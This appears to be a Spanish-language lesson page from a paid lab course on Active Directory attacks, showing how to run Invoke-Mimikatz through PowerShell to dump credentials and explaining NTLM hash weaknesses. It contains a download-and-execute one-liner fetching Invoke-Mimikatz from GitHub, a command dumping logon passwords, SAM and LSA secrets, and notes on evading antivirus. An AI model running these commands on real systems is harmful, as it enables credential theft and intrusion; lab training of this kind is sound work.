Comprar cursoYouTubeTwitterLinkedIn

Extraccion de credenciales con Mimikatz con PowerShell

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/j265a0. ¡Te esperamos para empezar este viaje juntos!

OBJETIVO DEL EJERCICIO #7:

Utilizar mimikatz en formato de powershell sobre Windows para exfiltrar secretos. Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER y First-DC.

Pros y Contras de ejecutar Mimikatz con mimikatz.ps1

Pros

  • Evasión: La versión de PowerShell puede ser más sigilosa, evadiendo mejor la detección de antivirus y soluciones EDR que buscan hashes de archivos conocidos.

  • Flexibilidad: Puede ser más fácil de ejecutar en memoria sin necesidad de escribir en el disco, lo cual es menos intrusivo y reduce la huella en el sistema de la víctima.

  • Integración: Se integra bien con otras herramientas y scripts de PowerShell, facilitando su uso en cadenas de ataque complejas.

Contras

  • Funcionalidad Limitada: Puede no tener todas las funciones que la versión completa .exe ofrece.

  • Logging de PowerShell: Las versiones más recientes de Windows tienen mejoras en el registro de actividades de PowerShell, lo que podría dejar rastros para los equipos de respuesta a incidentes.

  • Bloqueo de Scripts: Las políticas de ejecución de scripts y restricciones de firmas digitales pueden bloquear la ejecución de scripts PowerShell no firmados.

Los comandos utilizados son:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -Command '"token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::secrets"'

Despues de su ejecuccion, vamos obtener lo siguiente:

Uno de los hallazgos mas relevantes de la salida previa es el hash NTLM del administrador que es:

El hash NTLM (NT LAN Manager) es una función hash utilizada por Microsoft para almacenar contraseñas de usuario. Es un método de cifrado que ha sido utilizado en varios protocolos de autenticación de Microsoft a lo largo de los años, incluidos los protocolos de autenticación de red como NTLMv1 y NTLMv2.

Características y detalles sobre el hash NTLM:

  1. Forma de Creación: El hash NTLM se crea tomando la contraseña del usuario, convirtiéndola a Unicode y luego aplicando una función hash MD4.

  2. No tiene SALT: A diferencia de otros métodos de almacenamiento de contraseñas, el hash NTLM no utiliza un "salto" (valor aleatorio agregado para hacer que el hashing sea más seguro). Esto lo hace vulnerable a ataques de fuerza bruta y a ataques de tabla arco iris, donde los atacantes usan tablas precomputadas para buscar rápidamente el valor original de un hash.

  3. Uso en Protocolos: Aunque NTLM ha sido reemplazado en gran medida por métodos más seguros como Kerberos en entornos modernos de Active Directory, todavía se encuentra en muchas redes debido a la retrocompatibilidad o configuraciones heredadas.

  4. Vulnerabilidades: Debido a sus debilidades inherentes y la falta de características de seguridad modernas, NTLM es susceptible a una variedad de ataques, como el mencionado ataque de tabla arco iris, ataques de relevo NTLM, y otros.

  5. Recomendación: Debido a las debilidades conocidas asociadas con NTLM, se recomienda deshabilitar su uso siempre que sea posible, en favor de protocolos de autenticación más seguros como Kerberos.

AnteriorExtraccion de credenciales con Mimikatz con binarioSiguienteResolucion de errores con Mimikatz

Última actualización

¿Te fue útil?